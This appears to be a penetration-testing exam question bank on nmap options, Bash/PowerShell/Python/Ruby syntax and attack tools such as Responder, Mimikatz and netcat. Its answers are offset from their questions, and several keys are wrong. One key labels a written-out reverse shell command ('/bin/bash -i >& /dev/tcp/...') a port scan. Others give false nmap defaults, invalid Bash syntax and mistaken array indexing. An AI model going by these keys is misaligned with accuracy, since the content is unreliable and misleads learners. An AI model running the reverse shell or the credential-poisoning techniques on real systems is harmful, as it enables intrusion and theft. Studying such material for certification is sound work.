As a penetration tester, you want to scan a Linux server with an IP address of 192.168.1.200 in the target network for the 1000 most popular network services to see whether they are installed and running. However, you already know this host is running the DNS service, so you want to skip this port in the scan. Which nmap command will do this? A. nmap 192.168.1.200 -p 1-1000 --exclude-ports 53 B. nmap 192.168.1.200 --top-ports 1000 --exclude-ports 53 C. nmap 192.168.1.200 --well-known-ports --exclude-ports 53 D. nmap 192.168.1.200 --top-ports 1000

B. An if/then flow control structure in PowerShell uses the following syntax: - if condition { - commands... - } Else { - commands... - }

Consider the following snippet from a script: If (x -eq 2) { 'This number is 2' } Else { 'This number is not 2' } What scripting language is this snippet written in? A. Ruby B. PowerShell C. Bash D. Python

A. An if/then flow control structure in Ruby uses the following syntax: - if condition - commands... - else - commands... - end

Consider the following snippet from a script: if _x > 2 puts "x is greater than 2" else puts "x is less than or equal to 2" end What scripting language is this snippet written in? A. Ruby B. PowerShell C. Bash D. Python

D. The proxychains tool allows you to perform penetration test tasks against a target organization and make the network traffic generated look like it came from an intermediary proxy system.

During a black box penetration test, you need to use evasion to obscure your presence from system administrators in the target organization. Which tool could you use to do this? A. YASCA B. SonarQube C. SAST D. proxychains

B and C. You could use either Burp Suite or OWASP ZAP. Both of these tools could be used to intercept network traffic flowing between users running a web browser and the target organization's web application server. By proxying a connection, the penetration tester can read the contents of the intercepted traffic.

During a gray box penetration test, the tester needs to proxy connections between the target organization's web application server and client systems running web browsers. Which web proxy penetration testing tools could the tester use to do this? (Choose two.) A. searchsploit B. Burp Suite C. OWASP ZAP D. Impacket E. Empire

A. The netcat utility could be used to set up a reverse shell exploit that allows the tester to remotely control the compromised system.

During a gray box penetration test, the tester wants to be able to set up a reverse shell exploit where a compromised system on the target network "calls home" to a listener set up on the tester's laptop, enabling the tester to remotely control the compromised system. Which remote access tool could be used to do this? A. netcat B. Responder C. Impacket D. BeEF

D. The responder utility can be used to conduct LLMNR and NBT-NS poisoning, potentially allowing the penetration tester to redirect clients to her laptop and capture their credentials in the form of usernames and hashed passwords.

During a gray box penetration test, the tester wants to poison queries for the target organization's domain controller in order to redirect client requests to the tester's laptop and capture usernames and hashed passwords. Which utility could be used to do this? A. Searchsploit B. Empire C. Impacket D. Responder

A. In the Bash shell, a network socket can be opened to pass data through it. A TCP socket can be opened using /dev/tcp/<host>/<port>. Bash is attempting to open a TCP connection to the corresponding socket. So, in this example, a port scan has been performed. Here's a breakdown of the code: - /bin/bash -i invokes an interactive bash shell. - >& /dev/tcp/<host>/<port> pipes that shell to the tester. - 0<&1 2>&1 takes standard input and connects it to standard output. Then it specifies to do the same with standard error (2>).

During a penetration test, the following line of code was found in an exploited machine's history file: bin/bash -i >& /dev/tcp/192.168.0.10/80 0>&1 What best describes what this command line does? A. A port scan has been performed. B. Obtains the web server's banner. C. Redirects a teletypewriter (TTY) to a remote system. D. Removes the error logs for the given IP.

A and E. The many unsuccessful login attempts are a sure sign that the penetration tester is using a brute-force password cracking tool to gain access to the system. The Hydra and Medusa utilities are both capable of running a brute-force attack.

During a penetration test, the system administrator checks the log of the Linux server and notices thousands of unsuccessful login attempts. Which tool could the penetration tester be using? (Choose two.) A. Hydra B. YASCA C. nmap D. Tableau E. Medusa

D. In this scenario, the question specifically states "name resolution requests." In this case, Responder is the best choice. Responder is a toolkit used to answer NetBIOS queries from Windows systems on a network. Tcpdump is a type of packet analyzer software utility that monitors and logs TCP/IP traffic passing between a network and the computer on which it is executed. Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. Medusa is a brute-force login attack tool that supports a variety of protocols and services.

During an internal penetration test, several multicast and broadcast name resolution requests are observed moving through the network. A tester wants to impersonate network resources and collect authentication requests. What tool should be used? A. Ettercap B. Medusa C. Tcpdump D. Responder

E. The case structure is the best option presented to evaluate the user's choice of multiple selections and run the appropriate set of commands as a result.

In a Bash script, you need to prompt the user to select from one of seven different options presented with the echo command. Which control structure would best evaluate the user's input and run the appropriate set of commands? A. while loop B. for loop C. until loop D. if/then/else E. case

C and D. When declaring an array, both Ruby and Python use the same syntax: array_name = [value1, value2, value3, ...].

While reading an executable script file, you see a line near the beginning of the script that declares an array using the following syntax: PrimeNumArray = [2, 3, 5, 7, 11] Which type of script could this be? (Choose two.) A. PowerShell B. Bash C. Ruby D. Python

A. When referencing a value from an array, PowerShell uses the following syntax: $array_name[position]. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.

While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax: echo $PrimeNumArray[2] Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

B. When referencing a value from an array, Bash uses the following syntax: {$array_name[position]}. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.

While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax: echo {$PrimeNumArray[2]} Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

D. When referencing a value from an array, Python uses the following syntax: (array_name[position]). In this example, the print command is being told to print the second value of the array named PrimeNumArray.

While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax: print (PrimeNumArray[2]) Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

C. When referencing a value from an array, Ruby uses the following syntax: array_name[position]. In this example, the puts command is being told to use the second value of the array named PrimeNumArray.

While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax: puts PrimeNumArray[2] Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

B. When referencing the value of a variable, Bash uses the following syntax: {$variable_name}. In this example, the echo command is being told to display the value of the variable named ServerName on the screen.

While reading an executable script file, you see a line near the beginning of the script that references the value of a variable using the following syntax: echo {$ServerName} Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

C. Adding the tail /var/log/firewall 1> lastevents 2>&1 command to a Bash script will send both stdout and stderr to the same file.

Within a Bash script, you want to send the standard output and the standard error from the tail /var/log/firewall command to a file named lastevents in the current directory. Which command could you add to the script to do this? A. tail /var/log/firewall 1> lastevents 2> lastevents B. tail /var/log/firewall > lastevents C. tail /var/log/firewall 1> lastevents 2>&1 D. tail /var/log/firewall 1&2> lastevents

A. Network Mapper (Nmap) is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap will identify what devices are running on a client's systems, discover hosts and services that are available, find open ports, and detect security risks. In this scenario, the organization did not disable Telnet because port 23 is still open. Telnet is a client-server protocol, based on a reliable connection-oriented transport. Typically, this protocol runs over Transmission Control Protocol (TCP) using port 23, where a Telnet server application (telnetd) is listening.

You are a penetration tester and have run the following Nmap scan on a computer: nmap -sV 192.168.10.5. The client indicated that it had disabled Telnet from its environment. However, the Nmap scan results show that port 22 is closed and that port 23 is open to SSH. What might have happened to cause this? A. The organization did not disable Telnet. B. The nmap results contain a false positive for port 23. C. The service is running on a nonstandard port. D. Port 22 is filtered.

D. The nmap 192.168.1.1 -O command causes the nmap utility to use TCP/IP stack fingerprinting to determine the operating system installed on the remote host.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to determine the operating system running on this host. Which command should you use to do this? A. nmap 192.168.1.1 -sS B. nmap 192.168.1.1 -sL C. nmap 192.168.1.1 -sV D. nmap 192.168.1.1 -O

A. PowerShell requires the use of the $ before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list. Option B would work in Bash, option C would work in Ruby or Python, and option D does not follow the correct syntax for a PowerShell command. PowerShell is much simpler in the way that you declare and use variables. You just need to remember to precede the variable name with $, whether it's for setting, changing, or retrieving the value stored in that variable.

You are a penetration tester and want to create an array using a PowerShell script. Which lines of code would you use? A. $ports = 20, 25, 80, 443 B. ports = (20,25,80,443) C. ports = [20,25,80,443] D. $ports= [20,25,80,443]

C. Sqlmap is an open source tool used to automate SQL injection attacks against web applications with database back ends. Sqlmap is a commonly used open source database vulnerability scanner that allows security administrators to probe web applications for database vulnerabilities. For this scenario, Sqlmap is a dedicated database vulnerability scanner and is the most appropriate tool.

You are a penetration tester, and you are conducting a test on a specific client database server. You want to detect any vulnerabilities on the database server. Which tool will best assist you? A. Nessus B. Nikto C. Sqlmap D. OpenVAS

A. Custom Word List (CeWL) Generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization's websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.

You are a penetration tester, and you are planning to create a custom wordlist of common words and catchphrases about your client using the client's website. What is the name of the tool that you can utilize to assist with building a custom wordlist? A. CeWL B. Hashcat C. Hydra D. Medusa

C. Hping is a command-line tool that allows testers to generate network traffic. Hping is popular because it allows you to create custom packets. In this scenario, you will be sending TCP SYNs to TCP port 80. The -S switch asks hping to send SYN traffic, the -V switch is verbose mode, and the -p switch indicates the port.

You are a penetration tester, and you plan on using an hping command to send traffic to a remote system. What type of traffic will the remote system see when you use this script: hping remoteclient.com -S -V -p 80? A. HTTP traffic to TCP port 80 B. HTTPS traffic to TCP port 80 C. TCP SYNs to TCP port 80 D. TCP three-way handshake to TCP port 80

B. Mimikatz is an open source utility that enables the viewing of credential information from the Windows Local Security Authority Subsystem Service (LSASS) using its sekurlsa module. This information includes plaintext passwords and Kerberos tickets, which can then be used for attacks such as pass-the-hash and pass-the-ticket. In this scenario, however, the question states "over the wire." Mimikatz is the only tool that cannot be used that way.

You are a penetration tester, and you want to capture NTLM v2 hashes over the wire for use in a pass-the-hash attack. Which tool does not allow you to capture NTLM v2 hashes over the wire? A. Ettercap B. Mimikatz C. Metasploit D. Responder

A. Impacket is a collection of Python classes for working with network protocols. Impacket provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit's SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you've captured the messages.

You are a penetration tester, and you want to capture user hashes on a Windows network. You want to gather broadcast messages and have the ability to authenticate with hashes once you have captured them. What tool should you use? A. Impacket B. Metasploit C. Responder D. Wireshark

A. Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes, providing more detailed information. GeoIP refers to the method of locating a computer terminal's geographic location by identifying that terminal's IP address.

You are a penetration tester, and you want to do a search to see your client's computers and devices that are connected to the Internet and that will show you the geoIP information, if available. Which tool can you use to accomplish this? A. Censys B. Shodan C. theHarvester D. Whois

B. Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes.

You are a penetration tester, and you want to do a search to see your client's computers and devices that are connected to the Internet by using a variety of filters. Which tool can you use to accomplish this? A. Censys B. Shodan C. theHarvester D. Whois

B. Using nmap's basic functionality is quite simple. Port scanning a system just requires that nmap is installed and that you provide the target system's hostname or IP address. By default, nmap scans the 1,000 most common ports for both TCP and UDP. However, the full range of ports available to both TCP and UDP services is 1-65,535.

You are a penetration tester, and you want to use nmap to scan a remote system. You will be using the following command: nmap 142.78.32.0/24 How many TCP ports will you be scanning? A. 256 B. 1,000 C. 1,024 D. 65,535

A. The nmap 192.168.1.1 -A command enables OS detection, service version detection, script scanning, and traceroute to the remote host.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to determine the operating system running on this host. Which command could you use to do this? A. nmap 192.168.1.1 -A B. nmap 192.168.1.1 -T1 C. nmap 192.168.1.1 -sT D. nmap 192.168.1.1 -f

A. The -sS option causes the nmap utility to conduct a SYN port scan of the specified target system.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a SYN port scan of this host. Which command should you use to do this? A. nmap 192.168.1.1 -sS B. nmap 192.168.1.1 -sT C. nmap 192.168.1.1 -sU D. nmap 192.168.1.1 -sA

A and B. The nmap 192.168.1.1 -sS command causes the nmap utility to conduct a SYN port scan of the specified target system. Likewise, the nmap 192.168.1.1 command also causes the nmap utility to conduct a SYN port scan of the specified target system because a SYN scan is the default used if no other scan type is specified.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a SYN port scan of this host. Which commands could you use to do this? (Choose two.) A. nmap 192.168.1.1 -sS B. nmap 192.168.1.1 C. nmap 192.168.1.1 -sV D. nmap 192.168.1.1 -O E. nmap 192.168.1.1 -T0

A. The nmap 192.168.1.1 -sA command causes the nmap utility to conduct a TCP ACK scan of the specified target system.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP ACK scan of this host. Which command should you use to do this? A. nmap 192.168.1.1 -sA B. nmap 192.168.1.1 -T1 C. nmap 192.168.1.1 -sT D. nmap 192.168.1.1 -ACK

C. The nmap 192.168.1.1 -sT command causes the nmap utility to conduct a TCP connect scan of the specified target system.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP connect scan of this host. Which command should you use to do this? A. nmap 192.168.1.1 -sL B. nmap 192.168.1.1 -T1 C. nmap 192.168.1.1 -sT D. nmap 192.168.1.1 -f

D. The nmap 192.168.1.1 -sU command causes the nmap utility to conduct a UDP port scan of the specified target system.

You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a UDP port scan of this host. Which command should you use to do this? A. nmap 192.168.1.1 -sL B. nmap 192.168.1.1 -U C. nmap 192.168.1.1 -sT D. nmap 192.168.1.1 -sU

D. The nmap 192.168.1.1-254 -p 23 command causes the nmap utility to scan the specified range of IP addresses for hosts with Telnet port 23 open.

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all of the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) that have the Telnet port open. Which command should you use to do this? A. nmap 192.168.1.0/24 -s 23 B. nmap 192.168.1.0/24 -p 21 C. nmap 192.168.1.1-254 -p 21 D. nmap 192.168.1.1-254 -p 23

B. The nmap 192.168.1.1-254 -sn command causes the nmap utility to scan the specified range of IP addresses for hosts. It lists all the hosts found without actually scanning any of their ports.

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all of the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning any ports on those hosts. Which command should you use to do this? A. nmap 192.168.1.0/16 -sL B. nmap 192.168.1.1-254 -sn C. nmap 192.168.1.1-254 -sW D. nmap 192.168.1.0/16 -sM

A. The nmap 192.168.1.0/24 -sL command causes the nmap utility to scan the specified range of IP addresses for hosts. It simply lists targets to scan.

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning those hosts. Which command should you use to do this? A. nmap 192.168.1.0/24 -sL B. nmap 192.168.1.0/24 --list C. nmap 192.168.1.1-254 -sW D. nmap 192.168.1.1-254 -sM

A. The nmap 192.168.1.10-13 -sA command causes the nmap utility to conduct a TCP ACK scan of the target systems with IP addresses of 192.168.1.10, 192.168.1.11, and 192.168.1.13.

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to run a TCP ACK scan of hosts on the network with IP addresses of 192.168.1.10, 192.168.1.11, and 192.168.1.13. Which command should you use to do this? A. nmap 192.168.1.10-13 -sA B. nmap 192.168.1.0/24 -sA C. nmap 192.168.1.10/24 -sA D. nmap 192.168.1.10-13 -sT

C. Because the hosts to be scanned do not have contiguous IP addresses, you must specify each host individually. In this case, the nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -sU command causes the nmap utility to conduct a UDP port scan of each specified system.

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to run a UDP scan of hosts on the network with IP addresses of 192.168.1.10, 192.168.1.11, 192.168.1.13, and 192.168.1.15. Which command should you use to do this? A. nmap 192.168.1.10-15 -sU B. nmap 192.168.1.0/24 -sU C. nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -sU D. nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -

A. The nmap 192.168.1.2 -p- command causes the nmap utility to scan all ports on the specified host. Be aware that the scan will take some time to complete because of the number of ports involved.

You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to scan all of the ports on a network host with an IP address of 192.168.1.2. Which command should you use to do this? A. nmap 192.168.1.2 -p- B. nmap 192.168.1.2 -p all C. nmap 192.168.1.2 -s all D. nmap 192.168.1.2 -p 1-1024

A. When nmap indicates a port is closed, it usually means either the associated service is not installed at all or it has been installed but currently isn't running. Therefore, nothing is listening on its associated port.

You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Closed. What could this mean? A. The Telnet service is installed but not running. B. The Telnet service is installed, running, and accessible. C. The Telnet service is not installed, and a different service is using its default port. D. The Telnet service is not installed. E. The Telnet service is installed and running, but a host firewall is blocking it.

D. When nmap indicates a port is filtered, it usually means the associated service is installed and running, but a host firewall is blocking the port.

You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Filtered. What does this likely mean? A. The Telnet service is installed but not running. B. The Telnet service is not installed. C. The Telnet service is not installed, and a different service is using its default port. D. The Telnet service is installed and running, but a host firewall is blocking it.

B. When nmap indicates a port is open, it usually means the associated service is installed, is running, and is accessible through the host firewall.

You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Open. What does this mean? A. The Telnet service is installed but not running. B. The Telnet service is installed, running, and accessible. C. The Telnet service is not installed, and a different service is using its default port. D. The Telnet service is not installed.

C. The nmap 192.168.1.0/24 --exclude 192.168.1.250 command causes the nmap utility to scan every system on the subnet from .1 to .254 but skips the host with an IP address of 192.168.1.250.

You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0), but without scanning the host with an IP address of 192.168.1.250 (which you suspect is a honeypot host). Which command should you use to do this? A. nmap 192.168.1.1-254 B. nmap 192.168.1.0/24 --noscan 192.168.1.250 C. nmap 192.168.1.0/24 --exclude 192.168.1.250 D. nmap 192.168.1.1-254 --skip 192.168.1.250

D and E. The nmap 192.168.1.0/24 command causes the nmap utility to scan every system on the subnet, from .1 to .254. Likewise, the nmap 192.168.1.1-254 command causes the nmap utility to scan every system on the subnet, from .1 to .254.

You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0). Which commands could you use to do this? (Choose two.) A. nmap 192.168.1.0 B. nmap 192.168.1.0-255 C. nmap 192.168.1.0 -m:255.255.255.0 D. nmap 192.168.1.0/24 E. nmap 192.168.1.1-254

B. In this scenario, conditional execution is used, so only one clause runs. The condition on the if clause is true, so the code following it executes, and the elif and else clauses are never reached. Conditional execution allows developers to write code that runs only when certain logical conditions are met. The most common conditional execution structure is the if..then..else statement.

You are writing the following Python code: if 1 == 1: print("howdy") elif 3 == 3: print("howdy") else: print("howdy") How many times will this code print the word howdy? A. 0 B. 1 C. 2 D. 3

C. The -iL file_name option tells nmap to read the specified file and scan only those hosts listed in the file.

You have created a list of target hosts that you want to scan with nmap and saved it to a text file named /root/targets.txt. Which command should you use to run the scan using this file? A. nmap -iR /root/targets.txt B. nmap --file /root/targets.txt C. nmap -iL /root/targets.txt D. nmap -iF /root/targets.txt

B. Adding the read TargetHost line to a Bash script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

You need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost? A. echo $TargetHost B. read TargetHost C. readln TargetHost D. input $TargetHost

D. Adding the $TargetHost = read-host -Prompt line to a PowerShell script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

You need to create a PowerShell script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost? A. TargetHost = input('Please enter a hostname:') B. read TargetHost C. TargetHost = gets D. $TargetHost = read-host -Prompt

A. Adding the TargetHost = input('Please enter a hostname:') line to a Python script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

You need to create a Python script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost? A. TargetHost = input('Please enter a hostname:') B. read TargetHost C. TargetHost = gets D. $TargetHost = read-host -Prompt

C. Adding the TargetHost = gets line to a Ruby script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

You need to create a Ruby script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost? A. TargetHost = input('Please enter a hostname:') B. read TargetHost C. TargetHost = gets D. $TargetHost = read-host -Prompt

A and E. You can enter /bin/bash ~/myexploit, or enter chmod u+x ~/myexploit followed by ~/myexploit, to make the script execute.

You've created a Bash script in your home directory on a Linux system named myexploit. How can you execute it? (Choose two.) A. Enter /bin/bash ~/myexploit at the shell prompt. B. Enter myexploit at the shell prompt. C. Select Computer ➢ Run in the graphical desktop; then enter ~/myexploit and select Run. D. Enter run ~/myexploit at the shell prompt. E. Enter chmod u+x ~/myexploit; then enter ~/myexploit at the shell prompt.
